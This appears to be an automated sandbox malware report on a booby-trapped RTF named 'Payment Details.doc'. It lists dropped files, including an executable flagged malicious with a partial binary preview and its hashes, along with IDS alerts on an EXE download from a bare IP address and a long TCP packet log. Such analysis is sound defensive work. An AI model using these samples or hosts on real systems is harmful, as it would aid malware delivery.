                                                Preview:L..................F.... ...{...r...{...r...3@./....FD...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....:Y.;..user.8......QK.X:Y.;*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.FD..:Y.; .PAYMEN~1.DOC..T.......WD..WD.*.........................P.a.y.m.e.n.t. .D.e.t.a.i.l.s...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\Payment Details.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .D.e.t.a.i.l.s...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9..W.e8...8...

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):4.638759133144317
                                                Encrypted:false
                                                SSDEEP:3:M1OeLCvmUm42eLCvmUv:MMeIYeIl
                                                MD5:050F4E054DCD7B7C414ED9D34978C0C7
                                                SHA1:C6E5E10900348EA75DE84EBC6C7ECED98E6CF8B1
                                                SHA-256:B74618C3B807ED4AE387C404AB747827F5DCBC3FDEEA8DE6C3AB82AF99D23F30
                                                SHA-512:8F4C2C0D5597FA5A46CBC4F15D57314995850D600C6BFA64B11493EA9D16BFD579A2CEDD6C3824C95C90555826557113F32963E3B3FB107CA22A8D95B5054D2F
                                                Malicious:false
                                                Preview:[doc]..Payment Details.LNK=0..[folders]..Payment Details.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):704000
                                                Entropy (8bit):7.875943883609069
                                                Encrypted:false
                                                SSDEEP:12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
                                                MD5:42F2CE52A57E0D72EAC297A532354E42
                                                SHA1:7F2F1EF38365147865F1CEC2C1D0AD62CDC6F7D0
                                                SHA-256:516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                                                SHA-512:6BD38183780B7DC761CFEAAFB3742F17A1CEADE827FC0D815CFF8969F0FD530E4ACE5FB70754E056FED44939EF774A4F5EF4B6A7FE9EC2F4C43BB3C49D4BFEEE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Joe Sandbox View:
                                                • Filename: Payment Slip.doc, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@.................................$...O........ ........................................................................... ............... ..H............text...|.... ...................... ..`.rsrc.... ......."..................@..@.reloc..............................@..B................X.......H........Y..\5..........,....&...........................................0..|........(..........(....}......{....(....}........(....}........(....}........(....}........(....}........(....}........(....}....*.0..!..........(.... l...Y m...Z..(....X.+..*....0..m........s....}..... ....}.....#......cA}..... .ig.}.....#......c.}..... .'....s....}........s....}......}......}.....(.......(.......8..........>...%..,.o....s.......{.....{....(....}......{.....{....( ...}......{.....{

                                                C:\Users\user\Desktop\~$yment Details.doc

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                Static File Info

                                                General

                                                File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (46361), with CRLF, CR, LF line terminators
                                                Entropy (8bit):2.737409172276696
                                                TrID:
                                                • Rich Text Format (4004/1) 100.00%
                                                File name:Payment Details.doc
                                                File size:541'766 bytes
                                                MD5:cab2151d548586a1b3321aba7bde603d
                                                SHA1:6ada134af583ecda2a082aeb17a3a258a0cd548f
                                                SHA256:9e487bc68596a0c3c19aa9fed8040f452b4cbeca97451952994da511d4db2773
                                                SHA512:c06b7002dfa67749deff7a4f2ca709ff8f24994d494b497fcf58c3d19109f8f5bc6d357dc778c826c1071d8db5bec0994dfa70362fb91c9911b3f8f9faa6926a
                                                SSDEEP:6144:rwAYwAYwAYwAYwAtho2R3Ht7DPyvUCHsPPNJ22eN:F2
                                                TLSH:B2B4452DD30B01599FA2437B9B5B1E5546BCBA3EF38011B0346C537933EAC3996226BD
                                                File Content Preview:{\rt..{\*\XKYydH5QOtsSHYGOOiVm75xrrFZ6CHXBAuJ7qhlbBadf7cHdo4a8LY9dSepyeeJJXYBFOK4B0S63ife6nzC60yfiOFiARFc4IG2cRhNxUXArEDkZzVHwEutsL5BwicrD66nV9L7iJsjPon0q4fixDtFuxB5ZeHTXb5NDgmhD7UjxdvpgfTPR5R9ZtZNMOmqqTEg1BZWFaP2npAbsSzHez6zf}..{\747704918please click En

                                                File Icon

                                                Icon Hash:2764a3aaaeb7bdbf

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-09-26T09:25:01.423749+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1166.63.187.12380192.168.2.2249163TCP
                                                2024-09-26T09:25:01.577030+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2166.63.187.12380192.168.2.2249163TCP
                                                2024-09-26T09:25:10.807351+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164132.226.247.7380TCP
                                                2024-09-26T09:25:11.914961+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164132.226.247.7380TCP
                                                2024-09-26T09:25:12.311060+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249166188.114.97.3443TCP
                                                2024-09-26T09:25:17.999080+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167193.122.130.080TCP
                                                2024-09-26T09:25:29.958052+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249173188.114.97.3443TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 09:25:00.678853035 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:00.683767080 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:00.683852911 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:00.684156895 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:00.688972950 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423650026 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423692942 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423710108 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423712969 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423724890 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423732042 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423738003 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423744917 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423748970 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423758030 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423769951 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423789024 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423810005 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423821926 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423832893 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423842907 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.423844099 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423856020 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.423870087 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.428469896 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.428493023 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.428517103 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.428528070 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.428680897 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.428693056 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.428720951 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.428729057 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.464065075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.574364901 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574382067 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574394941 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574455023 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574470997 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.574497938 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.574531078 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574553967 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574565887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.574594975 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574606895 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.574615002 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.574634075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.575192928 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575211048 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575222015 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575234890 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.575252056 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.575304985 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575314999 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575333118 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.575345039 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.575365067 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.575978994 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576021910 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576044083 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576055050 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576075077 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576090097 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576127052 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576138020 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576148033 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576165915 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576180935 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576927900 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576972008 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.576976061 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.576987982 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.577008963 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.577020884 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.577029943 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.577064037 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.579360008 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.579406023 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.579411983 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.579447985 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719317913 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719346046 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719361067 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719378948 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719398022 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719408989 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719476938 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719589949 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719607115 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719614029 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719618082 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719630003 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719645023 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719793081 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719829082 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719865084 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719876051 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719896078 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719911098 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719930887 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719940901 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.719961882 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.719974041 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720086098 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720119953 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720139027 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720149994 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720170975 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720184088 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720303059 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720334053 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720345974 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720355988 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720377922 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720390081 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720457077 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720468044 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720482111 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720491886 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720493078 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720508099 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720523119 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720796108 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720830917 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720837116 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720841885 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720861912 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720875025 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720921040 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720931053 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720941067 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.720952988 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.720968962 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721203089 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721241951 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721256971 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721267939 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721302986 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721302986 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721368074 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721379042 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721389055 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721399069 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721406937 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721421003 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721434116 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721568108 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721577883 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721587896 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721599102 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721605062 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721610069 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.721620083 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.721635103 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722197056 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722208977 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722219944 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722239971 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722253084 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722301960 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722315073 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722327948 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722333908 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722340107 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722347021 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722363949 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722373962 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.722402096 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.722434044 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.724334002 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.724345922 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.724379063 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864394903 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864434958 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864447117 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864485025 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864496946 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864510059 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864521980 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864532948 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864558935 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864590883 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864754915 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864765882 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864777088 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864788055 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864799023 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864809036 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864820004 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864871979 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864909887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864934921 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864947081 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.864957094 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.864978075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865009069 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865041018 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865052938 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865062952 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865073919 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865080118 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865083933 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865094900 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865094900 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865108967 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865123987 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865170002 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865189075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865211964 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865283966 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865294933 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865304947 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865314960 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865324020 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865325928 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865339041 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865487099 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865494967 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865498066 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865509033 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865520000 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865520954 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865530014 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865537882 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865551949 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865566969 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:01.865712881 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865724087 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865734100 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865745068 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865755081 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:01.865755081 CEST4916380192.168.2.2266.63.187.123
